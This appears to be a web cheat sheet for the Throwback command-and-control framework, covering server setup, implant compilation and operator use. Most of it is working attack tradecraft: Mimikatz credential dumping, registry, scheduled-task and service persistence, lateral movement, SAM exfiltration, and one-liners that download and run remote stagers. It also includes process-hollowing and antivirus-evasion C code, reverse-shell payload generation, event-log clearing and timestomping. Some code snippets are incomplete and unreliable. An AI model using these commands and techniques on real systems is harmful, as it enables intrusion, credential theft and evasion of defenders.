Appearance
Throwback C2 Framework Cheat Sheet
Overview
Throwback is a HTTP/HTTPS beaconing implant with a C2 server designed for red team operations and penetration testing. Developed by Silent Break Security, it consists of a C++ backdoor implant and a PHP/MySQL-based command and control server. Throwback focuses on covert communications, persistence, and stealth operations with minimal footprint.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.
Installation
Prerequisites
bash
# Install dependencies (Ubuntu/Debian)
sudo apt update
sudo apt install -y apache2 mysql-server php php-mysql php-curl php-json git build-essential mingw-w64
# Install cross-compilation tools for Windows
sudo apt install -y gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
# Start services
sudo systemctl start apache2
sudo systemctl start mysql
sudo systemctl enable apache2
sudo systemctl enable mysqlMySQL Setup
sql
-- Configure MySQL database
sudo mysql -u root -p
CREATE DATABASE throwback;
CREATE USER 'throwback'@'localhost' IDENTIFIED BY 'StrongPassword123!';
GRANT ALL PRIVILEGES ON throwback.* TO 'throwback'@'localhost';
FLUSH PRIVILEGES;
EXIT;Server Installation
bash
# Clone Throwback repository
git clone https://github.com/silentbreaksec/Throwback.git
cd Throwback
# Set up web server directory
sudo cp -r Server/* /var/www/html/
sudo chown -R www-data:www-data /var/www/html/
sudo chmod -R 755 /var/www/html/
# Configure database connection
sudo nano /var/www/html/config.phpConfiguration File
php
<?php
// config.php - Database configuration
$servername = "localhost";
$username = "throwback";
$password = "StrongPassword123!";
$dbname = "throwback";
// C2 Server settings
$c2_host = "192.168.1.100";
$c2_port = 80;
$ssl_enabled = false;
$beacon_interval = 30;
$jitter = 10;
// Authentication
$admin_username = "admin";
$admin_password = "SecurePassword456!";
// Encryption key (change this!)
$encryption_key = "YourSecretEncryptionKey123";
// Debug mode
$debug_mode = false;
?>Database Schema Setup
sql
-- Create database tables
USE throwback;
CREATE TABLE agents (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255) UNIQUE NOT NULL,
hostname VARCHAR(255),
username VARCHAR(255),
ip_address VARCHAR(45),
os_version VARCHAR(255),
process_id INT,
process_name VARCHAR(255),
first_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
last_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
status ENUM('active', 'inactive', 'dead') DEFAULT 'active'
);
CREATE TABLE tasks (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255),
task_id VARCHAR(255) UNIQUE NOT NULL,
command TEXT,
arguments TEXT,
status ENUM('pending', 'sent', 'completed', 'failed') DEFAULT 'pending',
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
completed_at TIMESTAMP NULL,
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
CREATE TABLE results (
id INT AUTO_INCREMENT PRIMARY KEY,
task_id VARCHAR(255),
agent_id VARCHAR(255),
output LONGTEXT,
error_output TEXT,
received_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (task_id) REFERENCES tasks(task_id),
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
CREATE TABLE files (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255),
filename VARCHAR(255),
filepath TEXT,
filesize BIGINT,
file_hash VARCHAR(64),
upload_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);Implant Compilation
Windows Implant (x64)
bash
# Compile 64-bit Windows implant
cd Implant
x86_64-w64-mingw32-gcc -o throwback_x64.exe \
-DHOST=\"192.168.1.100\" \
-DPORT=80 \
-DSSL=0 \
-DINTERVAL=30 \
-DJITTER=10 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols for smaller size
x86_64-w64-mingw32-strip throwback_x64.exeWindows Implant (x86)
bash
# Compile 32-bit Windows implant
i686-w64-mingw32-gcc -o throwback_x86.exe \
-DHOST=\"192.168.1.100\" \
-DPORT=80 \
-DSSL=0 \
-DINTERVAL=30 \
-DJITTER=10 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols
i686-w64-mingw32-strip throwback_x86.exeHTTPS Implant
bash
# Compile with SSL support
x86_64-w64-mingw32-gcc -o throwback_https.exe \
-DHOST=\"secure.example.com\" \
-DPORT=443 \
-DSSL=1 \
-DINTERVAL=60 \
-DJITTER=20 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32Custom Build Script
bash
#!/bin/bash
# build_implant.sh - Custom implant builder
HOST="192.168.1.100"
PORT="80"
SSL="0"
INTERVAL="30"
JITTER="10"
KEY="YourSecretEncryptionKey123"
OUTPUT_DIR="./builds"
# Create output directory
mkdir -p $OUTPUT_DIR
# Build x64 implant
echo "[+] Building x64 implant..."
x86_64-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x64.exe \
-DHOST=\"$HOST\" \
-DPORT=$PORT \
-DSSL=$SSL \
-DINTERVAL=$INTERVAL \
-DJITTER=$JITTER \
-DKEY=\"$KEY\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Build x86 implant
echo "[+] Building x86 implant..."
i686-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x86.exe \
-DHOST=\"$HOST\" \
-DPORT=$PORT \
-DSSL=$SSL \
-DINTERVAL=$INTERVAL \
-DJITTER=$JITTER \
-DKEY=\"$KEY\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols
x86_64-w64-mingw32-strip $OUTPUT_DIR/throwback_x64.exe
i686-w64-mingw32-strip $OUTPUT_DIR/throwback_x86.exe
echo "[+] Implants built successfully in $OUTPUT_DIR"
ls -la $OUTPUT_DIR/Web Interface
Accessing the Interface
bash
# Access web interface
http://192.168.1.100/index.php
# Login credentials (from config.php)
Username: admin
Password: SecurePassword456!
# HTTPS access (if SSL configured)
https://secure.example.com/index.phpDashboard Overview
| Section | Description |
|---|---|
| Agents | View and manage active implants |
| Tasks | Create and monitor tasks |
| Results | View command execution results |
| Files | Manage uploaded/downloaded files |
| Logs | View system and error logs |
| Settings | Configure C2 server settings |
Agent Management
php
// View active agents
GET /agents.php
// Agent details
GET /agent_details.php?id=AGENT_ID
// Kill agent
POST /kill_agent.php
{
"agent_id": "AGENT_ID"
}Command Execution
Basic Commands
bash
# System information
whoami # Current user
hostname # Computer name
pwd # Current directory
dir # List directory contents
cd [directory] # Change directory
type [file] # Read file contents
# Process management
tasklist # List running processes
taskkill /PID [pid] # Kill process by PID
taskkill /IM [name] # Kill process by name
# Network information
ipconfig /all # Network configuration
netstat -an # Network connections
arp -a # ARP table
route print # Routing tableFile Operations
bash
# File management
download [file] # Download file from target
upload [local] [remote] # Upload file to target
copy [source] [dest] # Copy file
move [source] [dest] # Move file
del [file] # Delete file
mkdir [directory] # Create directory
rmdir [directory] # Remove directory
# File search
dir /s [pattern] # Search for files
findstr [pattern] [file] # Search within filesRegistry Operations
bash
# Registry queries
reg query [key] # Query registry key
reg add [key] /v [value] /d [data] # Add registry value
reg delete [key] /v [value] # Delete registry value
# Common registry locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\ServicesCredential Operations
bash
# Credential harvesting
mimikatz # Execute Mimikatz
sekurlsa::logonpasswords # Dump logon passwords
lsadump::sam # Dump SAM database
lsadump::cache # Dump cached credentials
# Token manipulation
whoami /priv # Check privileges
whoami /groups # Check group membershipAdvanced Features
Persistence Mechanisms
bash
# Registry persistence
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"
# Scheduled task persistence
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon
# Service persistence
sc create "WindowsUpdateService" binPath= "C:\Windows\Temp\throwback.exe" start= auto
sc start "WindowsUpdateService"
# Startup folder persistence
copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Lateral Movement
bash
# Remote execution via WMI
wmic /node:[target] /user:[user] /password:[pass] process call create "cmd.exe /c [command]"
# PSExec-style execution
net use \\[target]\IPC$ /user:[user] [password]
copy throwback.exe \\[target]\C$\Windows\Temp\
sc \\[target] create "TempService" binPath= "C:\Windows\Temp\throwback.exe"
sc \\[target] start "TempService"
# PowerShell remoting
powershell -c "Invoke-Command -ComputerName [target] -Credential (Get-Credential) -ScriptBlock {[command]}"Data Exfiltration
bash
# File exfiltration
download C:\Users\Administrator\Documents\sensitive.docx
download C:\Windows\System32\config\SAM
download C:\inetpub\logs\LogFiles\W3SVC1\*.log
# Database exfiltration
sqlcmd -S [server] -E -Q "SELECT * FROM sensitive_table" -o output.txt
download output.txt
# Registry exfiltration
reg export HKLM\SAM sam.reg
download sam.regSteganography
bash
# Hide data in images
copy /b image.jpg + data.txt hidden.jpg
upload hidden.jpg C:\Windows\Temp\wallpaper.jpg
# Hide executables in legitimate files
copy /b legitimate.pdf + throwback.exe hidden.pdfAutomation and Scripting
PHP Automation Script
php
<?php
// automation.php - Automated task execution
require_once 'config.php';
class ThrowbackAutomation {
private $db;
public function __construct() {
$this->db = new mysqli($GLOBALS['servername'], $GLOBALS['username'],
$GLOBALS['password'], $GLOBALS['dbname']);
}
public function getActiveAgents() {
$result = $this->db->query("SELECT * FROM agents WHERE status = 'active'");
return $result->fetch_all(MYSQLI_ASSOC);
}
public function createTask($agent_id, $command, $arguments = '') {
$task_id = uniqid('task_');
$stmt = $this->db->prepare("INSERT INTO tasks (agent_id, task_id, command, arguments) VALUES (?, ?, ?, ?)");
$stmt->bind_param("ssss", $agent_id, $task_id, $command, $arguments);
return $stmt->execute();
}
public function automatedRecon($agent_id) {
$commands = [
'whoami',
'hostname',
'ipconfig /all',
'tasklist',
'netstat -an',
'dir C:\Users',
'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
];
foreach ($commands as $cmd) {
$this->createTask($agent_id, $cmd);
sleep(2);
}
}
public function credentialHarvesting($agent_id) {
// Check if agent has admin privileges first
$this->createTask($agent_id, 'whoami', '/priv');
sleep(5);
// Execute credential harvesting
$this->createTask($agent_id, 'mimikatz', 'sekurlsa::logonpasswords');
$this->createTask($agent_id, 'mimikatz', 'lsadump::sam');
$this->createTask($agent_id, 'mimikatz', 'lsadump::cache');
}
public function establishPersistence($agent_id) {
$persistence_commands = [
'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"',
'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon',
'copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"'
];
foreach ($persistence_commands as $cmd) {
$this->createTask($agent_id, 'cmd', "/c $cmd");
sleep(3);
}
}
}
// Usage
$automation = new ThrowbackAutomation();
$agents = $automation->getActiveAgents();
foreach ($agents as $agent) {
echo "[+] Processing agent: {$agent['agent_id']}\n";
$automation->automatedRecon($agent['agent_id']);
// Wait before credential harvesting
sleep(30);
$automation->credentialHarvesting($agent['agent_id']);
// Establish persistence
$automation->establishPersistence($agent['agent_id']);
}
?>Python API Client
python
#!/usr/bin/env python3
# throwback_client.py - Python API client for Throwback
import requests
import json
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class ThrowbackClient:
def __init__(self, base_url, username, password):
self.base_url = base_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.authenticate(username, password)
def authenticate(self, username, password):
"""Authenticate with Throwback server"""
auth_data = {
'username': username,
'password': password
}
response = self.session.post(f"{self.base_url}/login.php", data=auth_data)
if response.status_code == 200 and "dashboard" in response.text.lower():
print("[+] Authentication successful")
else:
raise Exception("Authentication failed")
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"{self.base_url}/api/agents.php")
return response.json()
def create_task(self, agent_id, command, arguments=""):
"""Create a new task for an agent"""
task_data = {
'agent_id': agent_id,
'command': command,
'arguments': arguments
}
response = self.session.post(f"{self.base_url}/api/tasks.php", data=task_data)
return response.json()
def get_task_results(self, task_id):
"""Get results for a specific task"""
response = self.session.get(f"{self.base_url}/api/results.php?task_id={task_id}")
return response.json()
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
task_data = {
'agent_id': agent_id,
'command': 'download',
'arguments': remote_path
}
response = self.session.post(f"{self.base_url}/api/download.php", data=task_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
print(f"[+] File downloaded: {local_path}")
else:
print(f"[-] Download failed: {response.text}")
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\\Users",
"systeminfo"
]
task_ids = []
for cmd in commands:
print(f"[+] Executing: {cmd}")
result = self.create_task(agent_id, cmd)
if 'task_id' in result:
task_ids.append(result['task_id'])
time.sleep(2)
return task_ids
def wait_for_results(self, task_ids, timeout=300):
"""Wait for task results"""
start_time = time.time()
completed_tasks = []
while len(completed_tasks) < len(task_ids) and (time.time() - start_time) < timeout:
for task_id in task_ids:
if task_id not in completed_tasks:
results = self.get_task_results(task_id)
if results and results.get('status') == 'completed':
completed_tasks.append(task_id)
print(f"[+] Task {task_id} completed")
print(f"Output: {results.get('output', '')}")
time.sleep(5)
return completed_tasks
# Usage example
if __name__ == "__main__":
client = ThrowbackClient("http://192.168.1.100", "admin", "SecurePassword456!")
# Get active agents
agents = client.get_agents()
print(f"[+] Found {len(agents)} active agents")
for agent in agents:
agent_id = agent['agent_id']
print(f"[+] Processing agent: {agent_id}")
# Perform reconnaissance
task_ids = client.automated_recon(agent_id)
# Wait for results
completed = client.wait_for_results(task_ids)
print(f"[+] Completed {len(completed)} tasks for agent {agent_id}")PowerShell Automation
powershell
# throwback_automation.ps1 - PowerShell automation script
function Invoke-ThrowbackAutomation {
param(
[string]$ServerURL = "http://192.168.1.100",
[string]$Username = "admin",
[string]$Password = "SecurePassword456!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @{
username = $Username
password = $Password
}
try {
$loginResponse = Invoke-WebRequest -Uri "$ServerURL/login.php" -Method POST -Body $authData -WebSession $session
if ($loginResponse.StatusCode -eq 200) {
Write-Host "[+] Authentication successful"
}
}
catch {
Write-Error "Authentication failed: $_"
return
}
# Get active agents
try {
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents.php" -WebSession $session
$agents = $agentsResponse.Content | ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
}
catch {
Write-Error "Failed to get agents: $_"
return
}
# Process each agent
foreach ($agent in $agents) {
Write-Host "[+] Processing agent: $($agent.agent_id)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\Users",
"systeminfo"
)
foreach ($cmd in $commands) {
$taskData = @{
agent_id = $agent.agent_id
command = $cmd
arguments = ""
}
try {
$taskResponse = Invoke-WebRequest -Uri "$ServerURL/api/tasks.php" -Method POST -Body $taskData -WebSession $session
Write-Host "[+] Task created for command: $cmd"
Start-Sleep -Seconds 2
}
catch {
Write-Warning "Failed to create task for command '$cmd': $_"
}
}
# Wait before processing next agent
Start-Sleep -Seconds 10
}
}
# Execute automation
Invoke-ThrowbackAutomationEvasion Techniques
Anti-Virus Evasion
c
// AV evasion techniques in implant code
// String obfuscation
char obfuscated_url[] = {0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x00}; // "http://"
// API hashing
DWORD hash_api(char* api_name) {
DWORD hash = 0;
while (*api_name) {
hash = ((hash << 5) + hash) + *api_name++;
}
return hash;
}
// Sleep obfuscation
void obfuscated_sleep(DWORD milliseconds) {
LARGE_INTEGER interval;
interval.QuadPart = -(milliseconds * 10000LL);
NtDelayExecution(FALSE, &interval);
}
// Process hollowing
BOOL process_hollowing(char* target_process, char* payload) {
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0};
// Create suspended process
if (!CreateProcess(target_process, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
return FALSE;
}
// Unmap original image
ZwUnmapViewOfSection(pi.hProcess, GetImageBase(pi.hProcess));
// Allocate memory and write payload
LPVOID base_addr = VirtualAllocEx(pi.hProcess, GetImageBase(pi.hProcess),
payload_size, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, base_addr, payload, payload_size, NULL);
// Resume execution
ResumeThread(pi.hThread);
return TRUE;
}Network Evasion
c
// Domain fronting implementation
char fronted_domain[] = "cdn.example.com";
char real_host[] = "c2.malicious.com";
// Custom user agents
char user_agents[][256] = {
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
};
// Jitter implementation
void jittered_sleep(DWORD base_interval, DWORD jitter_percent) {
DWORD jitter = (base_interval * jitter_percent) / 100;
DWORD min_sleep = base_interval - jitter;
DWORD max_sleep = base_interval + jitter;
DWORD actual_sleep = min_sleep + (rand() % (max_sleep - min_sleep + 1));
Sleep(actual_sleep * 1000);
}
// Traffic shaping
void shape_traffic(char* data, DWORD data_size) {
// Split large data into smaller chunks
DWORD chunk_size = 1024 + (rand() % 2048); // Random chunk size
DWORD chunks = (data_size + chunk_size - 1) / chunk_size;
for (DWORD i = 0; i < chunks; i++) {
DWORD current_chunk_size = min(chunk_size, data_size - (i * chunk_size));
send_chunk(data + (i * chunk_size), current_chunk_size);
// Random delay between chunks
Sleep((rand() % 5000) + 1000); // 1-6 seconds
}
}Memory Evasion
c
// Memory encryption
void encrypt_memory(LPVOID address, SIZE_T size, BYTE key) {
BYTE* ptr = (BYTE*)address;
for (SIZE_T i = 0; i < size; i++) {
ptr[i] ^= key;
}
}
// Heap encryption
typedef struct {
LPVOID original_addr;
SIZE_T size;
BYTE key;
} ENCRYPTED_HEAP;
ENCRYPTED_HEAP* allocate_encrypted_heap(SIZE_T size) {
ENCRYPTED_HEAP* heap = malloc(sizeof(ENCRYPTED_HEAP));
heap->original_addr = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
heap->size = size;
heap->key = (BYTE)(rand() % 256);
// Encrypt allocated memory
encrypt_memory(heap->original_addr, heap->size, heap->key);
return heap;
}
// Stack string obfuscation
void obfuscated_string_copy(char* dest, char* src, BYTE key) {
while (*src) {
*dest++ = *src++ ^ key;
}
*dest = '\0';
}Integration with Other Tools
Metasploit Integration
bash
# Use Throwback with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Throwback
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
cmd /c C:\Windows\Temp\update.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
runEmpire Integration
bash
# Generate Empire stager
# Use Throwback for initial access, pivot to Empire
# From Throwback implant
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
executeCobalt Strike Integration
bash
# Beacon integration
# Generate Cobalt Strike beacon
# Use Throwback for initial access, pivot to Beacon
# From Throwback implant
cmd /c powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team serverOperational Security
Communication Security
bash
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Example HTTPS configuration
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
# Configure Apache for HTTPS
sudo a2enmod ssl
sudo systemctl restart apache2Traffic Analysis Evasion
bash
# Mimic legitimate traffic patterns
# Use common HTTP methods and headers
# Implement realistic timing
# Blend with normal network traffic
# Example legitimate traffic mimicking
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-aliveAnti-Forensics
bash
# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
# Secure deletion
sdelete -z -s C:\Windows\Temp\Troubleshooting
Common Issues
bash
# Implant not connecting
1. Check firewall rules
2. Verify web server configuration
3. Test network connectivity
4. Check database connection
# Database connection issues
# Test MySQL connection
mysql -u throwback -p -h localhost throwback
# Web server issues
# Check Apache error logs
sudo tail -f /var/log/apache2/error.log
# Check PHP errors
sudo tail -f /var/log/apache2/error.log | grep PHPDebug Mode
php
// Enable debug mode in config.php
$debug_mode = true;
// Check debug logs
tail -f /var/log/apache2/access.log
tail -f /var/log/apache2/error.logPerformance Optimization
bash
# Optimize MySQL
sudo mysql_secure_installation
# Optimize Apache
sudo a2enmod rewrite
sudo a2enmod deflate
sudo systemctl restart apache2
# Monitor system resources
htop
iotop
netstat -tulpnBest Practices
Operational Planning
- Pre-engagement setup: Configure server and compile implants before engagement
- Communication protocols: Establish secure C2 communication channels
- Data handling: Implement secure data collection and storage
- Cleanup procedures: Plan for artifact removal and operational cleanup
- Team coordination: Use centralized C2 for team collaboration
Security Considerations
bash
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Implant management
# Use unique encryption keys
# Implement kill dates
# Regular implant rotation
# Secure communication channelsDocumentation and Reporting
bash
# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution preventionResources
- Throwback GitHub Repository
- Silent Break Security Blog
- Red Team Operations Guide
- MITRE ATT&CK Framework
- SANS Red Team Operations
This cheat sheet provides a comprehensive reference for using Throwback C2 framework. Always ensure you have proper authorization before conducting red team operations or penetration testing.